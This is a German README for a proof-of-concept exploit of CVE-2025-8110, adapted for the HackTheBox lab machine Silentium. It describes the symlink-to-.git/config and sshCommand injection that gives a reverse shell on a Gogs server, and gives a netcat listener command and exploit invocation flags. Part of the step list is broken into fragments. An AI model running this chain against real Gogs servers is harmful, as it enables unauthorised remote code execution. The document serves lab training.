
CVE-2025-8110 Speziell für die Silentium-Box auf HTB.
Haftungsausschluss: Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests gedacht. Verwenden Sie es nur gegen Systeme, für die Sie eine ausdrückliche Genehmigung zum Testen haben.
Dies ist eine modifizierte Version von zAbuQasem/gogs-CVE-2025-8110, angepasst für die Maschine Silentium auf HackTheBox. Der ursprüngliche PoC musste angepasst werden, um die spezifische Gogs-Konfiguration und den Authentifizierungsablauf von Silentium zu berücksichtigen.
CVE-2025-8110 ist eine Schwachstelle zur Remote-Code-Ausführung in Gogs, einem selbst gehosteten Git-Dienst.
Der Datei-Update-API-Endpunkt von Gogs (PUT /api/v1/repos/.../contents/<file>) validiert nicht, ob die Zieldatei ein Symlink ist. Ein authentifizierter Angreifer kann einen Symlink, der auf .git/config zeigt, in ein Repository pushen und dann die API nutzen, um ihn mit einer bösartigen Nutzlast zu überschreiben. Die Nutzlast injiziert einen benutzerdefinierten sshCommand in die Git-Konfiguration, den Gogs beim nächsten SSH-Vorgang auf diesem Repository serverseitig ausführt, was zu Remote-Code-Ausführung führt.
malicious_link -> .git/config) und pusht ihn..git/config, die sshCommand = <reverse shell> enthält..git/config, wodurch bei der nächsten SSH-Operation die Shell ausgelöst wird.Abhängigkeiten installieren:
pip install -r requirements.txt
Einen Listener starten:
nc -lvnp <PORT>
Den Exploit ausführen:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
Optional — über Burp Suite leiten:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| Flag | Beschreibung |
|---|---|
-u | Gogs-Basis-URL |
-lh | Ihre Angreifer-IP (Reverse-Shell-Host) |
-lp | Ihr Listener-Port |
-un | Ihr registrierter Gogs-Benutzername |
-pw | Ihr Gogs-Passwort |
-x | (Optional) Leitet den Datenverkehr über Burp auf localhost:8080 |